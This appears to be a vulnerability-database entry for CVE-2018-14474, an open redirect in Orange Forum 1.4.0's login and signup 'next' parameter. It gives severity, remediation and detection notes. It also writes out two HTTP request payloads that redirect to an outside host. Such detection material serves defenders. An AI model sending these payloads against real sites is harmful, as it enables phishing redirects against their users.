🔙 목록으로 돌아가기

CVE-2018-14474: Orange Forum 1.4.0 - Open Redirect

TitleOrange Forum 1.4.0 - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
RemediationUpgrade to a patched version of Orange Forum or apply the necessary security patches to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.02192
CVE IDCVE-2018-14474
CWE IDCWE-601
Tags cve2018 cve redirect orangeforum oss seclists goodoldweb vuln

🔍 Vulnerability Description

Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /login?next=http://interact.sh/?app.scan/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.11
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /signup?next=http://interact.sh/?app.scan/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-14474.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-14474.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A